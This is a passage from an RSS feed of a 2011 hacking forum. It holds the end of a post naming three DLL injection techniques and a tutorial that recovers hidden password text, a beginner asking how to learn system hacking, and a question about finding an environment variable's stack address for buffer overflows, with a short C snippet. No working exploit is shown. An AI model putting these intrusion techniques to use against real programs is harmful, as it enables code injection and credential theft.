Injection</b>]<br>DLL injecting is the process of injecting malicious code into a program by inserting your own DLL. Sound familiar? Yea, it's somewhat like Buffer Over-Flows where you rewrite the EIP to jump to code you would like to execute, but that's for a different paper. DLL injecting can be done in a variety of different ways. In a tutorial written by Robert Kuster, Robert lists 3 different techniques:<br>[list=1]<br>[*]Windows Hooks[/*:m]<br>[*]The CreateRemoteThread &amp; LoadLibrary Technique[/*:m]<br>[*]The CreateRemoteThread &amp; WriteProcessMemory Technique[/*:m][/list:o]<br>In this same tutorial, Robert creates a demo program which can gain hidden password text from a program and display it in plain text. It's most definitely worth a read for those interested, and is a great tutorial.<br><br>Three Ways to Inject Your Code into Another Process<br>DLL Injection and function interception tutorial<br>-----------------EOF-----------------]]></description>
   </item>
   <item>
      <title>What steps would you recommend??</title>
      <link>http://iexploit.org/index.php?p=/discussion/5785/what-steps-would-you-recommend</link>
      <pubDate>Mon, 29 Aug 2011 23:52:45 -0400</pubDate>
      <dc:creator>Mr. P-teo</dc:creator>
      <guid isPermaLink="false">5785@/index.php?p=/discussions</guid>
      <description><![CDATA[so, iv always wanted to be able to hack systems, i know a little webhacking but i want to be able to get the systems etc. so what step's and tools would you recommend???<br /><br />What OS?<br />What Tut's?<br /><br /><br />Thanks to anyone that helps me.]]></description>
   </item>
   <item>
      <title>Environment variables</title>
      <link>http://iexploit.org/index.php?p=/discussion/5833/environment-variables</link>
      <pubDate>Sat, 10 Sep 2011 03:27:51 -0400</pubDate>
      <dc:creator>x3n0n</dc:creator>
      <guid isPermaLink="false">5833@/index.php?p=/discussions</guid>
      <description><![CDATA[Everyone knows environment variables (PATH, USER, LOGNAME, etc...)<br>Well you can overwrite these variables (export &lt;VAR&gt;="&lt;new content&gt;") and that can be quite handy with buffer overflows.<br>But what I find hard is after I run a program (say I did a buffer overflow) and I want to find the environment variable USER and it's content in the stack.<br><br>I had some piece of code that supposed to get me the address (in hex):<br><div class="PreContainer"><pre>char *address = (char *)getenv(\&quot;USER\&quot;);<br>printf(\&quot;Address&amp;#58; %x\n\&quot;, &amp;address);</pre></div><br><br>but when I look at the returned address, its all 'random' shit I don't need. <br><br>So does anybody know how I can find the address of the env variable?<br><br>Thx up front ;)]]></description>
   </item>
   </channel>
</rss>